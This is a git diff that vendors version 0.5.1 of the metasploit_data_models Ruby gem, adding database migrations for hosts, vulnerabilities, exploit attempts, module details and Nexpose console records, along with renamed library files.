b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb new file mode 100755 index 0000000000..037af40ae1 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb @@ -0,0 +1,21 @@ +class AddNexposeConsolesTable < ActiveRecord::Migration + def self.up + create_table :nexpose_consoles do |t| + t.timestamps + t.boolean :enabled, :default => true + t.text :owner + t.text :address + t.integer :port, :default => 3780 + t.text :username + t.text :password + t.text :status + t.text :version + t.text :cert + t.binary :cached_sites + end + end + def self.down + drop_table :nexpose_consoles + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb new file mode 100755 index 0000000000..9411724344 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb @@ -0,0 +1,12 @@ +class AddNameToNexposeConsolesTable < ActiveRecord::Migration + + def self.up + add_column :nexpose_consoles, :name, :text + end + + def self.down + remove_column :nexpose_consoles, :name + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb new file mode 100755 index 0000000000..c0b8831bf1 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb @@ -0,0 +1,15 @@ +class AddProfilesTable < ActiveRecord::Migration + def self.up + create_table :profiles do |t| + t.timestamps + t.boolean :active, :default => true + t.text :name + t.text :owner + t.binary :settings + end + end + def self.down + drop_table :profiles + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb new file mode 100755 index 0000000000..b5fce6fd8f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb @@ -0,0 +1,9 @@ +class ExpandCredPtypeColumn < ActiveRecord::Migration + def self.up + change_column :creds, :ptype, :string, :limit => 256 + end + def self.down + change_column :creds, :ptype, :string, :limit => 16 + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb new file mode 100755 index 0000000000..4085f64843 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb @@ -0,0 +1,85 @@ +class AddInitialIndexes < ActiveRecord::Migration + def self.up + + + add_index :hosts, :address + add_index :hosts, :address6 + add_index :hosts, :name + add_index :hosts, :state + add_index :hosts, :os_name + add_index :hosts, :os_flavor + add_index :hosts, :purpose + + # Removed (conditionally dropped in the next migration) + # add_index :hosts, :comments + + add_index :services, :port + add_index :services, :proto + add_index :services, :state + add_index :services, :name + + # Removed (conditionally dropped in the next migration) + # add_index :services, :info + + add_index :notes, :ntype + + add_index :vulns, :name + + # Removed (conditionally dropped in the next migration) + # add_index :vulns, :info + + add_index :refs, :name + + add_index :web_sites, :vhost + add_index :web_sites, :comments + add_index :web_sites, :options + + add_index :web_pages, :path + add_index :web_pages, :query + + add_index :web_forms, :path + + add_index :web_vulns, :path + add_index :web_vulns, :method + add_index :web_vulns, :name + end + + def self.down + + remove_index :hosts, :address + remove_index :hosts, :address6 + remove_index :hosts, :name + remove_index :hosts, :state + remove_index :hosts, :os_name + remove_index :hosts, :os_flavor + remove_index :hosts, :purpose + remove_index :hosts, :comments + + remove_index :services, :port + remove_index :services, :proto + remove_index :services, :state + remove_index :services, :name + remove_index :services, :info + + remove_index :notes, :ntype + + remove_index :vulns, :name + remove_index :vulns, :info + + remove_index :refs, :name + + remove_index :web_sites, :vhost + remove_index :web_sites, :comments + remove_index :web_sites, :options + + remove_index :web_pages, :path + remove_index :web_pages, :query + + remove_index :web_forms, :path + + remove_index :web_vulns, :path + remove_index :web_vulns, :method + remove_index :web_vulns, :name + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb new file mode 100755 index 0000000000..54b681f273 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb @@ -0,0 +1,23 @@ +class PruneIndexes < ActiveRecord::Migration + def self.up + + if indexes(:hosts).map{|x| x.columns }.flatten.include?("comments") + remove_index :hosts, :comments + end + + if indexes(:services).map{|x| x.columns }.flatten.include?("info") + remove_index :services, :info + end + + if indexes(:vulns).map{|x| x.columns }.flatten.include?("info") + remove_index :vulns, :info + end + end + + def self.down + add_index :hosts, :comments + add_index :services, :info + add_index :vulns, :info + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb new file mode 100755 index 0000000000..4e77303fa0 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb @@ -0,0 +1,9 @@ +class ExpandNotes < ActiveRecord::Migration + def self.up + change_column :notes, :data, :text + end + def self.down + change_column :notes, :data, :string, :limit => 65536 + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb new file mode 100755 index 0000000000..24f16d642f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb @@ -0,0 +1,17 @@ +# Probably temporary, a spot to stash module names and their associated refs +# Don't count on it being populated at any given moment. +class AddModRefTable < ActiveRecord::Migration + + def self.up + create_table :mod_refs do |t| + t.string :module, :limit => 1024 + t.string :mtype, :limit => 128 + t.text :ref + end + end + + def self.down + drop_table :mod_refs + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb new file mode 100755 index 0000000000..f0c54fed98 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb @@ -0,0 +1,24 @@ +class AddDisplayNameToReportsTable < ActiveRecord::Migration + + class Report < ActiveRecord::Base + end + + def self.up + + add_column :reports, :name, :string, :limit => 63 + + # Migrate to have a default name. + + Report.find(:all).each do |report| + rtype = report.rtype.to_s =~ /^([A-Z0-9]+)\x2d/i ? $1 : "AUDIT" + default_name = rtype[0,57].downcase.capitalize + "-" + report.id.to_s[0,5] + report.name = default_name + report.save + end + end + + def self.down + remove_column :reports, :name + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb new file mode 100755 index 0000000000..6e86654bc5 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb @@ -0,0 +1,13 @@ +class InetColumns < ActiveRecord::Migration + + def self.up + change_column :hosts, :address, 'INET using address::INET' + remove_column :hosts, :address6 + end + + def self.down + change_column :hosts, :address, :text + add_column :hosts, :address6, :text + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb new file mode 100755 index 0000000000..56adf64625 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb @@ -0,0 +1,17 @@ +class MoreInetColumns < ActiveRecord::Migration + + def self.up + change_column :wmap_requests, :address, 'INET using address::INET' + remove_column :wmap_requests, :address6 + change_column :wmap_targets, :address, 'INET using address::INET' + remove_column :wmap_targets, :address6 + end + + def self.down + change_column :wmap_requests, :address, :string, :limit => 16 + add_column :wmap_requests, :address6, :string, :limit => 255 + change_column :wmap_targets, :address, :string, :limit => 16 + add_column :wmap_targets, :address6, :string, :limit => 255 + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb new file mode 100755 index 0000000000..2bbe8f9f77 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb @@ -0,0 +1,9 @@ +class AddScopeToHosts < ActiveRecord::Migration + def self.up + add_column :hosts, :scope, :text + end + + def self.down + remove_column :hosts, :scope + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb new file mode 100755 index 0000000000..5e9833d884 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb @@ -0,0 +1,9 @@ +class AddVirtualHostToHosts < ActiveRecord::Migration + def self.up + add_column :hosts, :virtual_host, :text + end + + def self.down + remove_column :hosts, :viritual_host + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb new file mode 100755 index 0000000000..75003d6d36 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb @@ -0,0 +1,9 @@ +class RenameWorkspaceMembers < ActiveRecord::Migration + def up + rename_table :project_members, :workspace_members + end + + def down + rename_table :workspace_members, :project_members + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb new file mode 100755 index 0000000000..fcd2f9e0ca --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb @@ -0,0 +1,21 @@ +class AddCounterCachesToHosts < ActiveRecord::Migration + + def self.up + add_column :hosts, :note_count, :integer, :default => 0 + add_column :hosts, :vuln_count, :integer, :default => 0 + add_column :hosts, :service_count, :integer, :default => 0 + + Mdm::Host.reset_column_information + Mdm::Host.all.each do |h| + Mdm::Host.reset_counters h.id, :notes + Mdm::Host.reset_counters h.id, :vulns + Mdm::Host.reset_counters h.id, :services + end + end + + def self.down + remove_column :hosts, :note_count + remove_column :hosts, :vuln_count + remove_column :hosts, :service_count + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb new file mode 100755 index 0000000000..0f946da39c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb @@ -0,0 +1,34 @@ +class AddVulnDetails < ActiveRecord::Migration + + def self.up + create_table :vuln_details do |t| + t.integer :vuln_id # Vuln table reference + t.float :cvss_score # 0.0 to 10.0 + t.string :cvss_vector # Ex: (AV:N/AC:L/Au:N/C:C/I:C/A:C)(AV:N/AC:L/Au:N/C:C/I:C/A:C) + + t.string :title # Short identifier + t.text :description # Plain text or HTML (trusted) + t.text :solution # Plain text or HTML (trusted) + t.binary :proof # Should be UTF-8, but may not be, sanitize on output + # Technically this duplicates vuln.info, but that field + # is poorly managed / handled today. Eventually we will + # replace vuln.info + + # Nexpose-specific fields + t.integer :nx_console_id # NexposeConsole table reference + t.integer :nx_device_id # Reference from the Nexpose side + t.string :nx_vuln_id # 'jre-java-update-flaw' + t.float :nx_severity # 0-10 + t.float :nx_pci_severity # 0-10 + t.timestamp :nx_published # Normalized from "20081205T000000000" + t.timestamp :nx_added # Normalized from "20081205T000000000" + t.timestamp :nx_modified # Normalized from "20081205T000000000" + t.text :nx_tags # Comma separated + + end + end + + def self.down + drop_table :vuln_details + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb new file mode 100755 index 0000000000..36e70892fa --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb @@ -0,0 +1,16 @@ +class AddHostDetails < ActiveRecord::Migration + + def self.up + create_table :host_details do |t| + t.integer :host_id # Host table reference + + # Nexpose-specific fields + t.integer :nx_console_id # NexposeConsole table reference + t.integer :nx_device_id # Reference from the Nexpose side + end + end + + def self.down + drop_table :host_details + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb new file mode 100755 index 0000000000..bd240ecdc5 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb @@ -0,0 +1,16 @@ +class ExpandDetails < ActiveRecord::Migration + + def self.up + add_column :vuln_details, :nx_vuln_status, :text + add_column :vuln_details, :nx_proof_key, :text + add_column :vuln_details, :src, :string + add_column :host_details, :src, :string + end + + def self.down + remove_column :vuln_details, :nx_vuln_status + remove_column :vuln_details, :nx_proof_key + remove_column :vuln_details, :src + remove_column :host_details, :src + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb new file mode 100755 index 0000000000..4122503692 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb @@ -0,0 +1,24 @@ +class ExpandDetails2 < ActiveRecord::Migration + + def self.up + add_column :host_details, :nx_site_name, :string + add_column :host_details, :nx_site_importance, :string + add_column :host_details, :nx_scan_template, :string + add_column :host_details, :nx_risk_score, :float + + add_column :vuln_details, :nx_scan_id, :integer + add_column :vuln_details, :nx_vulnerable_since, :timestamp + add_column :vuln_details, :nx_pci_compliance_status, :string + end + + def self.down + remove_column :host_details, :nx_site_name + remove_column :host_details, :nx_site_importance + remove_column :host_details, :nx_scan_template + remove_column :host_details, :nx_risk_score + + remove_column :vuln_details, :nx_scan_id + remove_column :vuln_details, :nx_vulnerable_since + remove_column :vuln_details, :nx_pci_compliance_status + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb new file mode 100755 index 0000000000..b943fe358f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb @@ -0,0 +1,19 @@ +class AddVulnAttempts < ActiveRecord::Migration + + def self.up + create_table :vuln_attempts do |t| + t.integer :vuln_id # Vuln table reference + t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited + t.boolean :exploited # Whether or not the attempt succeeded + t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant + t.string :username # The user that tested this vulnerability + t.text :module # The specific module name that was used + t.integer :session_id # Database identifier of any opened session + t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits) + end + end + + def self.down + drop_table :vuln_attempts + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb new file mode 100755 index 0000000000..c34101fd89 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb @@ -0,0 +1,14 @@ +class AddVulnAndHostCounterCaches < ActiveRecord::Migration + + def self.up + add_column :hosts, :host_detail_count, :integer, :default => 0 + add_column :vulns, :vuln_detail_count, :integer, :default => 0 + add_column :vulns, :vuln_attempt_count, :integer, :default => 0 + end + + def self.down + remove_column :hosts, :host_detail_count + remove_column :vulns, :vuln_detail_count + remove_column :vulns, :vuln_attempt_count + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb new file mode 100755 index 0000000000..cb99f7ee84 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb @@ -0,0 +1,118 @@ +class AddModuleDetails < ActiveRecord::Migration + + def self.up + + create_table :module_details do |t| + t.timestamp :mtime # disk modified time + t.text :file # location on disk + t.string :mtype # exploit, auxiliary, post, etc + t.text :refname # module path (no type) + t.text :fullname # module path with type + t.text :name # module title + t.integer :rank # exploit rank + t.text :description # + t.string :license # MSF_LICENSE + t.boolean :privileged # true or false + t.timestamp :disclosure_date # Mar 10 2004 + t.integer :default_target # 0 + t.text :default_action # "scan" + t.string :stance # "passive" + t.boolean :ready # true/false + end + + add_index :module_details, :refname + add_index :module_details, :name + add_index :module_details, :description + add_index :module_details, :mtype + + create_table :module_authors do |t| + t.integer :module_detail_id + t.text :name + t.text :email + end + add_index :module_authors, :module_detail_id + + create_table :module_mixins do |t| + t.integer :module_detail_id + t.text :name + end + add_index :module_mixins, :module_detail_id + + create_table :module_targets do |t| + t.integer :module_detail_id + t.integer :index + t.text :name + end + add_index :module_targets, :module_detail_id + + create_table :module_actions do |t| + t.integer :module_detail_id + t.text :name + end + add_index :module_actions, :module_detail_id + + create_table :module_refs do |t| + t.integer :module_detail_id + t.text :name + end + add_index :module_refs, :module_detail_id + add_index :module_refs, :name + + create_table :module_archs do |t| + t.integer :module_detail_id + t.text :name + end + add_index :module_archs, :module_detail_id + + create_table :module_platforms do |t| + t.integer :module_detail_id + t.text :name + end + add_index :module_platforms, :module_detail_id + + end + + def self.down + remove_index :module_details, :refname + remove_index :module_details, :name + remove_index :module_details, :description + remove_index :module_details, :mtype + + remove_index :module_authors, :module_detail_id + remove_index :module_mixins, :module_detail_id + remove_index :module_targets, :module_detail_id + remove_index :module_actions, :module_detail_id + remove_index :module_refs, :module_detail_id + remove_index :module_refs, :name + remove_index :module_archs, :module_detail_id + remove_index :module_platform, :module_detail_id + + drop_table :module_details + drop_table :module_authors + drop_table :module_mixins + drop_table :module_targets + drop_table :module_actions + drop_table :module_refs + drop_table :module_archs + drop_table :module_platforms + + end +end + +=begin + +Mdm::Host.find_by_sql(" +SELECT + hosts.id, hosts.address, module_details.mtype AS mtype, module_details.refname AS mname, vulns.name AS vname, refs.name AS vref +FROM + hosts,vulns,vulns_refs,refs,module_refs,module_details +WHERE + hosts.id = vulns.host_id AND + vulns.id = vulns_refs.vuln_id AND + vulns_refs.ref_id = refs.id AND + refs.name = module_refs.name AND + module_refs.module_detail_id = modules_details.id +").map{|x| [x.address, x.mname, x.vname, x.vref ] } + + +=end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb new file mode 100755 index 0000000000..22d3ec0b1f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb @@ -0,0 +1,26 @@ +class AddExploitAttempts < ActiveRecord::Migration + + def self.up + create_table :exploit_attempts do |t| + t.integer :host_id # Host table reference (primary) + t.integer :service_id # Service table reference (optional) + t.integer :vuln_id # Vuln table reference (optional) + t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited + t.boolean :exploited # Whether or not the attempt succeeded + t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant + t.string :username # The user that tested this vulnerability + t.text :module # The specific module name that was used + t.integer :session_id # Database identifier of any opened session + t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits) + t.integer :port # Port -> Services are created/destroyed frequently and failed + t.string :proto # Protocol | attempts may be against closed ports. + end + + add_column :hosts, :exploit_attempt_count, :integer, :default => 0 + end + + def self.down + drop_table :exploit_attempts + remove_column :hosts, :exploit_attempt_count + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb new file mode 100755 index 0000000000..7d6dd0f96b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb @@ -0,0 +1,12 @@ +class AddFailMessage < ActiveRecord::Migration + + def self.up + add_column :vuln_attempts, :fail_detail, :text + add_column :exploit_attempts, :fail_detail, :text + end + + def self.down + remove_column :vuln_attempts, :fail_detail + remove_column :exploit_attempts, :fail_detail + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb new file mode 100644 index 0000000000..2160e61de6 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb @@ -0,0 +1,13 @@ +class AddOwnerAndPayloadToWebVulns < ActiveRecord::Migration + + def self.up + add_column :web_vulns, :owner, :string + add_column :web_vulns, :payload, :text + end + + def self.down + remove_column :web_vulns, :owner + remove_column :web_vulns, :payload + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb new file mode 100644 index 0000000000..bf0f9d7297 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb @@ -0,0 +1,35 @@ +# Changes all the {COLUMNS} in the web_vulns table that are required for {Mdm::WebVuln}, but were previously +# :null => true +class ChangeRequiredColumnsToNullFalseInWebVulns < ActiveRecord::Migration + # Columns that were previously :null => true, but are actually required to be non-null, so should be + # :null => false + COLUMNS = [ + :category, + :confidence, + :method, + :name, + :params, + :path, + :pname, + :proof, + :risk + ] + # Table in which {COLUMNS} are. + TABLE_NAME = :web_vulns + + # Marks all the {COLUMNS} as :null => true + def down + COLUMNS.each do |column| + change_column_null(TABLE_NAME, column, true) + end + end + + # Marks all the {COLUMNS} as :null => false + def up + COLUMNS.each do |column| + change_column_null(TABLE_NAME, column, false) + end + end + + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm/host/operating_system_normalization.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm/host/operating_system_normalization.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/serialized_prefs.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/serialized_prefs.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/ip_format_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/ip_format_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/password_is_strong_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/password_is_strong_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb new file mode 100755 index 0000000000..ee7b61398b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb @@ -0,0 +1,8 @@ +module MetasploitDataModels + # MetasploitDataModels follows the {http://semver.org/ Semantic Versioning Specification}. At this time, the API + # is considered unstable because although the database migrations have moved from + # metasploit-framework/data/sql/migrate to db/migrate in this project, not all models have specs that verify the + # migrations (with have_db_column and have_db_index) and certain models may not be shared between metasploit-framework + # and pro, so models may be removed in the future. Because of the unstable API the version should 